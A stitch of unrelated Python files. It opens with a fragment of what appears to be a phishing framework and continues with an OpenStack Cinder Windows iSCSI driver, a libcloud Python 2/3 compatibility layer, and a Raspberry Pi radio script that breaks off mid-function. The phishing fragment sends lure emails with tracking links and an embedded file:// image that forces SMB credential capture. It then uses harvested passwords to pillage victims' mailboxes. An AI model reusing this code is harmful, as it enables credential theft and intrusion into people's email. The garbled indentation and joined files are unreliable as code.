                            Utils.screenCaptureWebSite("http://" + str(VHOST) + "." + self.config["phishing_domain"],
                                self.outdir + "screenshots/" + str(VHOST) + "." + self.config["phishing_domain"] + ".png")
                # Write PID file for later cleanup.
                pidfilename = os.path.join(self.pid_path, "spfwebsrv.pid")
                pidfile = open(pidfilename, 'w')
                pidfile.write(str(self.webserver.pid))
                pidfile.close()
                self.webserverpid = self.webserver.pid
                self.display.verbose("Started WebServer with pid = [%s]" % self.webserver.pid)
#----------------------------
# Build array of email templates
#----------------------------
def load_email_templates(self):
# do we even have targets?
if (((self.email_list is not None)
and (self.email_list))
and ((self.config["enable_email_sending"] == True)
or (self.config["simulate_email_sending"] == True))):
print()
self.display.verbose("Locating phishing email templates")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# loop over each email template
for f in os.listdir("templates/email/"):
template_file = os.path.join("templates/email/", f)
self.display.debug("Found the following email template: [%s]" % template_file)
if ((Utils.is_readable(template_file)) and (os.path.isfile(template_file))):
# read in the template SUBJECT, TYPE, and BODY
TYPE = ""
SUBJECT = ""
BODY = ""
with open (template_file, "r") as myfile:
for line in myfile.readlines():
match=re.search("TYPE=", line)
if match:
TYPE=line.replace('"', "")
TYPE=TYPE.split("=")
TYPE=TYPE[1].lower().strip()
match2=re.search("SUBJECT=", line)
if match2:
SUBJECT=line.replace('"', "")
SUBJECT=SUBJECT.split("=")
SUBJECT=SUBJECT[1].strip()
match3=re.search("BODY=", line)
if match3:
BODY=line.replace('"', "")
BODY=BODY.replace(r'\n', "\n")
BODY=BODY.split("=")
BODY=BODY[1].strip()
if ((TYPE + "_port").encode() in list(self.config.keys())):
self.email_templates[TYPE].append(EmailTemplate(TYPE, SUBJECT, BODY))
else:
self.display.debug(" No Matching webtemplate found. Skipping this email template.")
#----------------------------
# Generate/Send phishing emails
#----------------------------
    def send_emails(self):
        """Generate and send (or simulate sending) the phishing emails.

        Rotates through all loaded email templates whose TYPE matches a
        launched web site, popping one target address per template per pass
        until either the target list or the EMAILS_MAX budget is exhausted.
        Each message has its [[TARGET]] placeholder rewritten to the phishing
        URL (with an optional per-user tracking id) and is logged per
        template.  Delivery uses direct-MX or a specific SMTP account
        depending on config; the two modes are mutually exclusive.
        """
        # Are the required flags set?
        if ((self.config["enable_email_sending"] == True) or (self.config["simulate_email_sending"] == True)):
            if ((self.config["determine_smtp"] == "1") and (self.config["use_specific_smtp"] == "1")):
                self.display.error("ONLY 1 of DETERMINE_SMTP or USE_SPECIFIC_SMTP can be enabled at a time.")
            else:
                print()
                self.display.output("Sending phishing emails")
                if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
                    templates_logged = []
                    # do we have any emails to send?
                    if self.email_list:
                        temp_target_list = self.email_list
                        temp_delay = 1
                        if (self.config["email_delay"] is not None):
                            temp_delay = int(self.config["email_delay"])
                        send_count = 0
                        # while there are still target email addresses, loop
                        while (temp_target_list and (send_count < (int(self.config["emails_max"])))):
                            #for k in self.email_templates:
                            #    print(self.email_templates[k])
                            # inc number of emails we have attempted to send
                            send_count = send_count + 1
                            # delay requested amount of time between sending emails
                            time.sleep(temp_delay)
                            # for each type of email (citrix, owa, office365, ...)
                            for key in self.email_templates:
                                # only use templates whose matching web site was launched
                                if ((key+"_port").encode() in list(self.config.keys())):
                                    # double check
                                    if temp_target_list:
                                        # for each email template of the given type
                                        for template in self.email_templates[key]:
                                            # double check
                                            if temp_target_list:
                                                # grab a new target email address
                                                target = temp_target_list.pop(0)
                                                self.display.verbose("Sending Email to [%s]" % target)
                                                #FROM = "support@" + self.config["phishing_domain"]
                                                FROM = self.config["smtp_fromaddr"]
                                                SUBJECT = template.getSUBJECT()
                                                BODY = template.getBODY()
                                                # build an HTML variant of the plain-text body
                                                HTML_BODY = "<html><head></head><body>"
                                                HTML_BODY += BODY.replace('\n', '<br>')
                                                if self.config["enable_smb_server"] == "1":
                                                    # embedded file:// image forces an SMB connection
                                                    # (credential capture) when the mail is rendered
                                                    HTML_BODY += '<br> <img src=file://' + str(key) + "." + str(self.config["phishing_domain"]) + '/image/sig.jpg height="100" width="150"></a>'
                                                HTML_BODY += "</BODY></HTML>"
                                                # perform necessary SEARCH/REPLACE of [[TARGET]]
                                                if self.config["enable_host_based_vhosts"] == "1":
                                                    targetlink=str("http://" + str(key) + "." + str(self.config["phishing_domain"]))
                                                    if self.config["enable_user_tracking"] == "1":
                                                        targetlink += "?u=" + self.db.getUserTrackId(target)
                                                    BODY=BODY.replace(r'[[TARGET]]', targetlink)
                                                    HTML_BODY = HTML_BODY.replace(r'[[TARGET]]', '<a href="' + targetlink + '">' + targetlink + '</a>')
                                                else:
                                                    # NOTE(review): key is used as str above
                                                    # ((key+"_port").encode()) but compared/encoded as
                                                    # bytes here — the bytes/str handling looks
                                                    # inconsistent; confirm against web.py's keys.
                                                    if (not key == b"dynamic"):
                                                        k = (key.encode() + b"_port")
                                                        p = self.config[k]
                                                        targetlink=str("http://" + str(p))
                                                        if self.config["enable_user_tracking"] == "1":
                                                            targetlink += "?u=" + self.db.getUserTrackId(target)
                                                        BODY=BODY.replace(r'[[TARGET]]', str(targetlink))
                                                        HTML_BODY = HTML_BODY.replace(r'[[TARGET]]', '<a href="' + str(targetlink) + '">' + str(targetlink) + '</a>')
                                                # log each template once, then every target under it
                                                if (key not in templates_logged):
                                                    self.display.log("----------------------------------------------\n\n" +
                                                                     "TO: <XXXXX>\n" +
                                                                     "FROM: " + FROM + "\n" +
                                                                     "SUBJECT: " + SUBJECT + "\n\n" +
                                                                     BODY + "\n\n" +
                                                                     HTML_BODY + "\n\n" +
                                                                     "----------------------------------------------\n\n" +
                                                                     "TARGETS:\n" +
                                                                     "--------\n",
                                                                     filename="email_template_" + key + ".txt")
                                                    templates_logged.append(key)
                                                self.display.log(target + "\n", filename="email_template_" + key + ".txt")
                                                # send the email (or just pretend to)
                                                if (self.config["simulate_email_sending"] == True):
                                                    self.display.output("Would have sent an email to [%s] with subject of [%s], but this was just a test." % (target, SUBJECT))
                                                else:
                                                    try:
                                                        if self.config["determine_smtp"] == "1":
                                                            # deliver straight to the target's MX
                                                            emails.send_email_direct(target,
                                                                                     FROM,
                                                                                     self.config["smtp_displayname"],
                                                                                     SUBJECT,
                                                                                     BODY,
                                                                                     HTML_BODY,
                                                                                     self.config["attachment_filename"],
                                                                                     self.config["attachment_fullpath"],
                                                                                     True)
                                                        if self.config["use_specific_smtp"] == "1":
                                                            print(self.config["smtp_fromaddr"])
                                                            # deliver through a configured SMTP account
                                                            emails.send_email_account(self.config["smtp_server"],
                                                                                      int(self.config["smtp_port"]),
                                                                                      self.config["smtp_user"],
                                                                                      self.config["smtp_pass"],
                                                                                      target,
                                                                                      self.config["smtp_fromaddr"],
                                                                                      self.config["smtp_displayname"],
                                                                                      SUBJECT,
                                                                                      BODY,
                                                                                      HTML_BODY,
                                                                                      self.config["attachment_filename"],
                                                                                      self.config["attachment_fullpath"],
                                                                                      True)
                                                    except Exception as e:
                                                        self.display.error("Can not send email to " + target)
                                                        print(e)
#----------------------------
# Monitor web sites
#----------------------------
def monitor_results(self):
# are required flags set?
monitor = False
print()
self.display.output("Starting Monitoring Services")
self.display.alert("(Press CTRL-C to stop collection and generate report!)")
if self.config["enable_web"] == True:
monitor = True
self.display.output("Monitoring phishing website activity!")
if self.config["enable_smb_server"] == "1":
monitor = True
self.display.output("Monitoring SMB server activity!")
if monitor:
while True:
#if self.smbserver is not None:
# line = self.smbserver.stdout.readline()
# line = line.strip()
# self.display.output(line)
if (self.webserver is not None):
line = self.webserver.stdout.readline()
line = line.decode()
line = line.strip()
self.display.output(line)
if("CREDENTIALS" in line):
if (self.config["pillage_email"] == True):
self.pillage(line)
#==================================================
# Secondary METHODS
#==================================================
#----------------------------
# Pillage Emails
#----------------------------
def pillage(self, line):
username = None
password = None
# parse line into username/password
usermatch = re.match(".*username=(.*?), .*", line)
if (usermatch):
username = usermatch.group(1)
passmatch = re.match(".*password=(.*?), .*", line)
if (passmatch):
password = passmatch.group(1)
# if no username or password, then return
if ((not username) or (not password)):
return
# is it a new username/password pair we have not seen before?
if (not username+":"+password in self.pillaged_users):
self.pillaged_users.append(username+":"+password)
# make a new MailPillager if one does not exist
if (not self.mp):
self.mp = MailPillager()
# attempt to determine the best Mail Server to use
if (not self.bestMailServer):
self.determineBestMailServer()
# if no Best Mail Server was identified, return
if (not self.bestMailServer):
self.display.error("No valid target IMAP/POP3 mail servers were identified.")
return
#print self.bestMailServer + ":" + str(self.bestMailServerPort)
# PILLAGE!!!
self.mp.pillage(username=username, password=password, server=self.bestMailServer,
port=self.bestMailServerPort, domain=self.config["domain_name"], outputdir=self.outdir + "pillage_data/")
#----------------------------
# See which Mail Server we should use
#
# TODO: needs to be updated!!!
#----------------------------
def determineBestMailServer(self):
if self.server_list[993]: # IMAPS
self.bestMailServerPort = 993
self.bestMailServer = self.server_list[993][0]
elif self.server_list[143]: #IMAP
self.bestMailServerPort = 143
self.bestMailServer = self.server_list[143][0]
elif self.server_list[995]: # POP3S
self.bestMailServerPort = 995
self.bestMailServer = self.server_list[995][0]
elif self.server_list[110]: # POP3
self.bestMailServerPort = 110
self.bestMailServer = self.server_list[110][0]
#==========================================================================================
#==========================================================================================
#==========================================================================================
#----------------------------
# Primary METHOD
#----------------------------
def run(self, argv):
# load config
self.parse_parameters(argv)
self.load_config()
print("1")
# make directories
if not os.path.isdir(self.outdir + "reports/"):
os.makedirs(self.outdir + "reports/")
if not os.path.isdir(self.outdir + "logs/"):
os.makedirs(self.outdir + "logs/")
if not os.path.isdir(self.outdir + "screenshots/"):
os.makedirs(self.outdir + "screenshots/")
if not os.path.isdir(self.outdir + "web_clones/"):
os.makedirs(self.outdir + "web_clones/")
if not os.path.isdir(self.outdir + "pillage_data/"):
os.makedirs(self.outdir + "pillage_data/")
# dns/portscan/cloning
self.gather_dns()
self.port_scan()
self.profile_site()
# load websites
self.load_websites()
# start smbserver
self.start_smbserver()
# do email stuff
self.prep_email()
self.load_email_templates()
self.send_emails()
# sit back and listen
self.monitor_results()
| |
# Copyright 2012 Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Volume driver for Windows Server 2012
This driver requires ISCSI target role installed
"""
import os
from oslo_config import cfg
from cinder.image import image_utils
from cinder.openstack.common import fileutils
from cinder.openstack.common import log as logging
from cinder.volume import driver
from cinder.volume.drivers.windows import constants
from cinder.volume.drivers.windows import vhdutils
from cinder.volume.drivers.windows import windows_utils
LOG = logging.getLogger(__name__)

# Driver-specific configuration options registered with oslo.config.
windows_opts = [
    cfg.StrOpt('windows_iscsi_lun_path',
               # Raw string: '\i' is not a valid escape sequence and triggers
               # a DeprecationWarning in non-raw literals; the value itself
               # is unchanged.
               default=r'C:\iSCSIVirtualDisks',
               help='Path to store VHD backed volumes'),
]

CONF = cfg.CONF
CONF.register_opts(windows_opts)
class WindowsDriver(driver.ISCSIDriver):
    """Executes volume driver commands on Windows Storage server.

    Volumes are VHD/VHDX files exported over iSCSI through the Windows
    iSCSI target role; all Windows-specific work is delegated to
    windows_utils.WindowsUtils and vhdutils.VHDUtils.
    """
    VERSION = '1.0.0'
    def __init__(self, *args, **kwargs):
        super(WindowsDriver, self).__init__(*args, **kwargs)
        self.configuration = kwargs.get('configuration', None)
        if self.configuration:
            self.configuration.append_config_values(windows_opts)
    def do_setup(self, context):
        """Setup the Windows Volume driver.
        Called one time by the manager after the driver is loaded.
        Validate the flags we care about
        """
        self.utils = windows_utils.WindowsUtils()
        self.vhdutils = vhdutils.VHDUtils()
    def check_for_setup_error(self):
        """Check that the driver is working and can communicate."""
        self.utils.check_for_setup_error()
    def initialize_connection(self, volume, connector):
        """Driver entry point to attach a volume to an instance.

        :param volume: volume reference (provider_location holds the target)
        :param connector: dict with the initiator's IQN under 'initiator'
        :returns: iSCSI connection info dict for the caller
        """
        initiator_name = connector['initiator']
        target_name = volume['provider_location']
        self.utils.associate_initiator_with_iscsi_target(initiator_name,
                                                         target_name)
        properties = self.utils.get_host_information(volume, target_name)
        return {
            'driver_volume_type': 'iscsi',
            'data': properties,
        }
    def terminate_connection(self, volume, connector, **kwargs):
        """Driver entry point to unattach a volume from an instance.
        Unmask the LUN on the storage system so the given initiator can no
        longer access it.
        """
        initiator_name = connector['initiator']
        target_name = volume['provider_location']
        self.utils.delete_iscsi_target(initiator_name, target_name)
    def create_volume(self, volume):
        """Driver entry point for creating a new volume (a new VHD file)."""
        vhd_path = self.local_path(volume)
        vol_name = volume['name']
        vol_size = volume['size']
        self.utils.create_volume(vhd_path, vol_name, vol_size)
    def local_path(self, volume, format=None):
        # Path of the backing VHD file; format selection is delegated.
        return self.utils.local_path(volume, format)
    def delete_volume(self, volume):
        """Driver entry point for destroying existing volumes."""
        vol_name = volume['name']
        vhd_path = self.local_path(volume)
        self.utils.delete_volume(vol_name, vhd_path)
    def create_snapshot(self, snapshot):
        """Driver entry point for creating a snapshot."""
        # Getting WT_Snapshot class
        vol_name = snapshot['volume_name']
        snapshot_name = snapshot['name']
        self.utils.create_snapshot(vol_name, snapshot_name)
    def create_volume_from_snapshot(self, volume, snapshot):
        """Driver entry point for exporting snapshots as volumes."""
        snapshot_name = snapshot['name']
        self.utils.create_volume_from_snapshot(volume, snapshot_name)
    def delete_snapshot(self, snapshot):
        """Driver entry point for deleting a snapshot."""
        snapshot_name = snapshot['name']
        self.utils.delete_snapshot(snapshot_name)
    def _do_export(self, _ctx, volume, ensure=False):
        """Do all steps to get disk exported as LUN 0 at separate target.
        :param volume: reference of volume to be exported
        :param ensure: if True, ignore errors caused by already existing
            resources
        :return: iscsiadm-formatted provider location string
        """
        target_name = "%s%s" % (self.configuration.iscsi_target_prefix,
                                volume['name'])
        self.utils.create_iscsi_target(target_name, ensure)
        # Get the disk to add
        vol_name = volume['name']
        self.utils.add_disk_to_target(vol_name, target_name)
        return target_name
    def ensure_export(self, context, volume):
        """Driver entry point to get the export info for an existing volume."""
        self._do_export(context, volume, ensure=True)
    def create_export(self, context, volume):
        """Driver entry point to get the export info for a new volume."""
        loc = self._do_export(context, volume, ensure=False)
        return {'provider_location': loc}
    def remove_export(self, context, volume):
        """Driver entry point to remove an export for a volume.
        """
        target_name = "%s%s" % (self.configuration.iscsi_target_prefix,
                                volume['name'])
        self.utils.remove_iscsi_target(target_name)
    def copy_image_to_volume(self, context, volume, image_service, image_id):
        """Fetch the image from image_service and create a volume using it."""
        # Convert to VHD and file back to VHD
        vhd_type = self.utils.get_supported_vhd_type()
        with image_utils.temporary_file(suffix='.vhd') as tmp:
            volume_path = self.local_path(volume)
            image_utils.fetch_to_vhd(context, image_service, image_id, tmp,
                                     self.configuration.volume_dd_blocksize)
            # The vhd must be disabled and deleted before being replaced with
            # the desired image.
            self.utils.change_disk_status(volume['name'], False)
            os.unlink(volume_path)
            self.vhdutils.convert_vhd(tmp, volume_path,
                                      vhd_type)
            # volume['size'] is in GB; << 30 converts to bytes
            self.vhdutils.resize_vhd(volume_path,
                                     volume['size'] << 30)
            self.utils.change_disk_status(volume['name'], True)
    def copy_volume_to_image(self, context, volume, image_service, image_meta):
        """Copy the volume to the specified image."""
        disk_format = self.utils.get_supported_format()
        if not os.path.exists(self.configuration.image_conversion_dir):
            fileutils.ensure_tree(self.configuration.image_conversion_dir)
        temp_vhd_path = os.path.join(self.configuration.image_conversion_dir,
                                     str(image_meta['id']) + '.' + disk_format)
        upload_image = temp_vhd_path
        try:
            self.utils.copy_vhd_disk(self.local_path(volume), temp_vhd_path)
            # qemu-img does not yet fully support vhdx format, so we'll first
            # convert the image to vhd before attempting upload
            if disk_format == 'vhdx':
                # drop the trailing 'x': "<id>.vhdx" -> "<id>.vhd"
                upload_image = upload_image[:-1]
                self.vhdutils.convert_vhd(temp_vhd_path, upload_image,
                                          constants.VHD_TYPE_DYNAMIC)
            image_utils.upload_volume(context, image_service, image_meta,
                                      upload_image, 'vhd')
        finally:
            # best-effort cleanup of both intermediate files
            fileutils.delete_if_exists(temp_vhd_path)
            fileutils.delete_if_exists(upload_image)
    def create_cloned_volume(self, volume, src_vref):
        """Creates a clone of the specified volume."""
        # Create a new volume
        # Copy VHD file of the volume to clone to the created volume
        self.create_volume(volume)
        self.utils.copy_vhd_disk(self.local_path(src_vref),
                                 self.local_path(volume))
    def get_volume_stats(self, refresh=False):
        """Get volume stats.
        If 'refresh' is True, run update the stats first.
        """
        if refresh:
            self._update_volume_stats()
        return self._stats
    def _update_volume_stats(self):
        """Retrieve stats info for Windows device."""
        LOG.debug("Updating volume stats")
        data = {}
        backend_name = self.__class__.__name__
        if self.configuration:
            backend_name = self.configuration.safe_get('volume_backend_name')
        data["volume_backend_name"] = backend_name or self.__class__.__name__
        data["vendor_name"] = 'Microsoft'
        data["driver_version"] = self.VERSION
        data["storage_protocol"] = 'iSCSI'
        # capacity is not tracked; report unlimited with full reservation
        data['total_capacity_gb'] = 'infinite'
        data['free_capacity_gb'] = 'infinite'
        data['reserved_percentage'] = 100
        data['QoS_support'] = False
        self._stats = data
    def extend_volume(self, volume, new_size):
        """Extend an Existing Volume."""
        old_size = volume['size']
        LOG.debug("Extend volume from %(old_size)s GB to %(new_size)s GB.",
                  {'old_size': old_size, 'new_size': new_size})
        # utils.extend expects the *additional* size in MB
        additional_size = (new_size - old_size) * 1024
        self.utils.extend(volume['name'], additional_size)
| |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Libcloud Python 2.x and 3.x compatibility layer
# Some methods below are taken from Django PYK3 port which is licensed under 3
# clause BSD license
# https://bitbucket.org/loewis/django-3k
# pylint: disable=import-error
from __future__ import absolute_import
import sys
import types
# Flip to True to prefer lxml's etree implementation when it is installed.
DEFAULT_LXML = False
try:
    if DEFAULT_LXML:
        from lxml import etree as ET
    else:
        from xml.etree import ElementTree as ET
except ImportError:
    # lxml missing: fall back to the stdlib parser.
    from xml.etree import ElementTree as ET
# First pass at interpreter detection; PY2/PY3 are recomputed (redundantly)
# below, but the *_pre_* flags depend on these initial values.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
PY2_pre_25 = PY2 and sys.version_info < (2, 5)
PY2_pre_26 = PY2 and sys.version_info < (2, 6)
PY2_pre_27 = PY2 and sys.version_info < (2, 7)
PY2_pre_279 = PY2 and sys.version_info < (2, 7, 9)
PY3_pre_32 = PY3 and sys.version_info < (3, 2)
# Second pass: per-minor-version flags used for feature switches below.
PY2 = False
PY25 = False
PY26 = False
PY27 = False
PY3 = False
PY32 = False
if sys.version_info >= (2, 0) and sys.version_info < (3, 0):
    PY2 = True
if sys.version_info >= (2, 5) and sys.version_info < (2, 6):
    PY25 = True
if sys.version_info >= (2, 6) and sys.version_info < (2, 7):
    PY26 = True
if sys.version_info >= (2, 7) and sys.version_info < (2, 8):
    PY27 = True
if sys.version_info >= (3, 0):
    PY3 = True
if sys.version_info >= (3, 2) and sys.version_info < (3, 3):
    PY32 = True
if PY2_pre_279 or PY3_pre_32:
    # Old interpreters: hostname matching lives in a backport package.
    try:
        from backports.ssl_match_hostname import match_hostname, CertificateError  # NOQA
    except ImportError:
        import warnings
        warnings.warn("Missing backports.ssl_match_hostname package")
else:
    # ssl module in Python >= 3.2 includes match hostname function
    from ssl import match_hostname, CertificateError  # NOQA
# Version-specific shims: a common set of names (httplib, urlparse, b(),
# u(), tostring(), ...) is defined for whichever interpreter is running.
if PY3:
    import http.client as httplib
    from io import StringIO
    import urllib
    import urllib as urllib2
    # pylint: disable=no-name-in-module
    import urllib.parse as urlparse
    import xmlrpc.client as xmlrpclib
    from urllib.parse import quote as urlquote
    from urllib.parse import unquote as urlunquote
    from urllib.parse import urlencode as urlencode
    from os.path import relpath
    from imp import reload
    from builtins import bytes
    from builtins import next
    parse_qs = urlparse.parse_qs
    parse_qsl = urlparse.parse_qsl
    basestring = str
    def method_type(callable, instance, klass):
        # Bind to the instance if given, otherwise to a fresh klass().
        return types.MethodType(callable, instance or klass())
    def b(s):
        """Coerce str/bytes/int to a bytes value."""
        if isinstance(s, str):
            return s.encode('utf-8')
        elif isinstance(s, bytes):
            return s
        elif isinstance(s, int):
            return bytes([s])
        else:
            raise TypeError("Invalid argument %r for b()" % (s,))
    def ensure_string(s):
        """Coerce str/bytes to a str value (UTF-8 decode for bytes)."""
        if isinstance(s, str):
            return s
        elif isinstance(s, bytes):
            return s.decode('utf-8')
        else:
            raise TypeError("Invalid argument %r for ensure_string()" % (s,))
    def byte(n):
        # assume n is a Latin-1 string of length 1
        return ord(n)
    _real_unicode = str
    u = str
    def bchr(s):
        """Take an integer and make a 1-character byte string."""
        return bytes([s])
    def dictvalues(d):
        return list(d.values())
    def tostring(node):
        # 'unicode' encoding makes ElementTree return str, not bytes.
        return ET.tostring(node, encoding='unicode')
    def hexadigits(s):
        # s needs to be a byte string.
        return [format(x, "x") for x in s]
else:
    # Python 2 equivalents of the names exported above.
    import httplib  # NOQA
    from StringIO import StringIO  # NOQA
    import urllib  # NOQA
    import urllib2  # NOQA
    import urlparse  # NOQA
    import xmlrpclib  # NOQA
    from urllib import quote as _urlquote  # NOQA
    from urllib import unquote as urlunquote  # NOQA
    from urllib import urlencode as urlencode  # NOQA
    from __builtin__ import reload  # NOQA
    if PY25:
        # parse_qs/parse_qsl lived in cgi before Python 2.6.
        import cgi
        parse_qs = cgi.parse_qs
        parse_qsl = cgi.parse_qsl
    else:
        parse_qs = urlparse.parse_qs
        parse_qsl = urlparse.parse_qsl
    if not PY25:
        from os.path import relpath  # NOQA
    # Save the real value of unicode because urlquote needs it to tell the
    # difference between a unicode string and a byte string.
    _real_unicode = unicode
    basestring = unicode = str
    method_type = types.MethodType
    b = bytes = ensure_string = str
    def byte(n):
        return n
    u = unicode
    def bchr(s):
        """Take an integer and make a 1-character byte string."""
        return chr(s)
    _default_value_next = object()
    def next(iterator, default=_default_value_next):
        # Backport of the builtin next() with a default value.
        try:
            return iterator.next()
        except StopIteration:
            if default is _default_value_next:
                raise
            return default
    def dictvalues(d):
        return d.values()
    tostring = ET.tostring
    def urlquote(s, safe='/'):
        if isinstance(s, _real_unicode):
            # Pretend to be py3 by encoding the URI automatically.
            s = s.encode('utf8')
        return _urlquote(s, safe)
    def hexadigits(s):
        # s needs to be a string.
        return [x.encode("hex") for x in s]
    if PY25:
        import posixpath
        # Taken from http://jimmyg.org/work/code/barenecessities/index.html
        # (MIT license)
        # pylint: disable=function-redefined
        def relpath(path, start=posixpath.curdir):  # NOQA
            """Return a relative version of a path"""
            if not path:
                raise ValueError("no path specified")
            start_list = posixpath.abspath(start).split(posixpath.sep)
            path_list = posixpath.abspath(path).split(posixpath.sep)
            # Work out how much of the filepath is shared by start and path.
            i = len(posixpath.commonprefix([start_list, path_list]))
            rel_list = [posixpath.pardir] * (len(start_list) - i) + path_list[i:]
            if not rel_list:
                return posixpath.curdir
            return posixpath.join(*rel_list)
# unittest2 backports the 2.7 unittest API to older interpreters.
if PY27 or PY3:
    unittest2_required = False
else:
    unittest2_required = True
| |
#-*-encoding=UTF8-*-
# Module setup for a Raspberry Pi touchscreen internet radio (mpd/mpc based).
# NOTE: order matters below — the SDL_* environment variables must be set
# before pygame initialises the display.
import pygame
from pygame.locals import *
import time
import datetime
import sys
import os
import glob
import subprocess
import RPi.GPIO as GPIO
__VERSION__='1'
__RELEASE__='0'
# Route SDL to the TFT framebuffer and the touchscreen input device.
os.environ["SDL_FBDEV"] = "/dev/fb1"
os.environ["SDL_MOUSEDEV"] = "/dev/input/touchscreen"
os.environ["SDL_MOUSEDRV"] = "TSLIB"
# Drive GPIO 18 high; not required on every screen, but some displays use
# this pin to enable the backlight, so it is kept for compatibility.
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.OUT)
GPIO.output(18, GPIO.HIGH)
# Colour palette (R, G, B).
white = (255, 255, 255)
red = (255, 0, 0)
green = ( 0, 255, 0)
blue = ( 0, 0, 255)
black = ( 0, 0, 0)
cyan = ( 50, 255, 255)
magenta = (255, 0, 255)
yellow = (255, 255, 0)
orange = (255, 127, 0)
# Screen geometry for the 480x320 TFT.
width = 480
height = 320
size = (width, height)
screen = pygame.display.set_mode(size)
pygame.init()
# Disable the mouse cursor (touch-only UI).
pygame.mouse.set_visible(False)
# Fonts: the original script used the default font, droidsans is preferred.
#font = pygame.font.Font(None, 25)
font = pygame.font.Font(pygame.font.match_font('droidsans'), 18)
# A large font to display the clock.
fontLarge = pygame.font.Font(pygame.font.match_font('droidsans'), 54)
# Screensaver: minutes of inactivity before it kicks in.
screensaver_timer = 5 #time until screensaver will be enabled, in minutes
screensaver = False
# Load default skin (menu 1 of skin number 4, white).
menu = 1
skin_number = 4
max_skins = 4
font_color = cyan
skin1 = pygame.image.load("skins/skin_white_m1.png")
skin2 = pygame.image.load("skins/skin_white_m2.png")
skin = skin1
screen.blit(skin, (0, 0))
# Initial volume setting via mpc.
subprocess.call('mpc volume 75' , shell=True)
# Pre-rendered status labels and playback state.
reboot_label = font.render("rebooting...", 1, (font_color))
poweroff_label = font.render("shutting down", 1, (font_color))
song_title = " "
playlist = " "
# If needed to live reboot
def reboot():
    """Show a notice on the TFT, stop playback, then restart the machine."""
    # Blank the screen and display the pre-rendered "rebooting..." label.
    screen.fill(black)
    screen.blit(reboot_label, (10, 100))
    pygame.display.flip()
    # Give the message a moment to be read before going down.
    time.sleep(5)
    # Release the GPIO pins and stop mpd playback before rebooting.
    GPIO.cleanup()
    subprocess.call('mpc stop' , shell=True)
    subprocess.call('reboot' , shell=True)
# to power off cleanly
def poweroff():
    """Show a notice on the TFT, stop playback, then shut the machine down."""
    # Blank the screen and display the pre-rendered "shutting down" label.
    screen.fill(black)
    screen.blit(poweroff_label, (10, 100))
    pygame.display.flip()
    # Give the message a moment to be read before powering off.
    time.sleep(5)
    # Release the GPIO pins and stop mpd playback before halting.
    GPIO.cleanup()
    subprocess.call('mpc stop' , shell=True)
    subprocess.call('poweroff' , shell=True)
#copy playing title to favorite.txt
def favorite():
    """Append the currently playing title (global song_title) to the favorites file."""
    # print(...) works on both Python 2 and 3 for a single argument.
    print(song_title)
    # 'with' guarantees the handle is closed even if the write fails.
    with open('/var/www/favorite.txt', 'a') as f:
        f.write('-' + song_title + '\n')
#function runs if touchscreen was touched (and screensaver is disabled)
def on_touch():
    """Dispatch a touchscreen tap to the on-screen button under it.

    Reads the module-global `pos` (x, y) and fires button(1..8) for the
    2x4 grid of buttons; runs only while the screensaver is disabled.
    """
    # (x_min, x_max, y_min, y_max, button number): top row, then bottom row.
    hitboxes = (
        (12, 71, 179, 239, 1),
        (99, 158, 179, 239, 2),
        (186, 245, 179, 239, 3),
        (273, 332, 179, 239, 4),
        (12, 71, 250, 310, 5),
        (99, 158, 250, 310, 6),
        (186, 245, 250, 310, 7),
        (273, 332, 250, 310, 8),
    )
    for x_min, x_max, y_min, y_max, number in hitboxes:
        if x_min <= pos[0] <= x_max and y_min <= pos[1] <= y_max:
            button(number)
#which button (in which menu) was pressed on touch
def button(number):
    """Handle a press of on-screen button *number* for the current menu.

    Menu 1 is playback control (play/pause/volume/prev/next); menu 2 is
    system control (skin switching, quit, reboot, power off).  Button 8
    toggles between the two menus.
    """
    global menu
    if menu == 1:
        if number == 1:
            subprocess.call('mpc play' , shell=True)
            #print "play"
        if number == 2:
            subprocess.call('mpc pause' , shell=True)
            #print "pause"
        if number == 3:
            subprocess.call('mpc volume +5' , shell=True)
            #print "vol +x"
        if number == 4:
            subprocess.call('mpc volume 0' , shell=True)
            #print "vol 0"
        if number == 5:
            subprocess.call('mpc prev' , shell=True)
            #print "prev"
        if number == 6:
            subprocess.call('mpc next' , shell=True)
            #print "next"
        if number == 7:
            subprocess.call('mpc volume -5' , shell=True)
            #print "vol -x"
        if number == 8:
            # switch to the system-control menu
            menu = 2
            update_screen()
        return
    if menu == 2:
        if number == 1:
            # no more used
            #favorite()
            # used during development to display available fonts
            #print(pygame.font.get_fonts())
            update_screen()
        if number == 2:
            # cycle to the next skin; update_screen() wraps the counter
            global skin_number
            skin_number = skin_number+1
            #print skin_number
            update_screen()
        if number == 3:
            # leave the UI but keep mpd playing in the background
            pygame.quit()
            sys.exit()
        if number == 4:
            # quit the radio entirely (stop playback too)
            subprocess.call('mpc stop', shell=True)
            pygame.quit()
            sys.exit()
        if number == 5:
            print "power off"
            poweroff()
        if number == 6:
            print "reboot"
            reboot()
        if number == 7:
            # force a screen refresh
            update_screen()
        if number == 8:
            # switch back to the playback menu
            menu = 1
            update_screen()
        return
# Function to redraw the whole display (or blank it for the screensaver).
def update_screen():
    """Render the screen for the current menu.

    Reads the globals ``skin_number``, ``menu`` and ``screensaver``;
    wraps ``skin_number`` back to 1 once it exceeds ``max_skins``.
    Shells out to ``mpc`` for station/title/volume information and to
    ``hostname`` / ``vcgencmd`` for the system info on menu 2.
    """
    global skin_number
    if skin_number == max_skins+1:
        skin_number = 1
    #load skin, select font color in accordance
    if skin_number == 1:
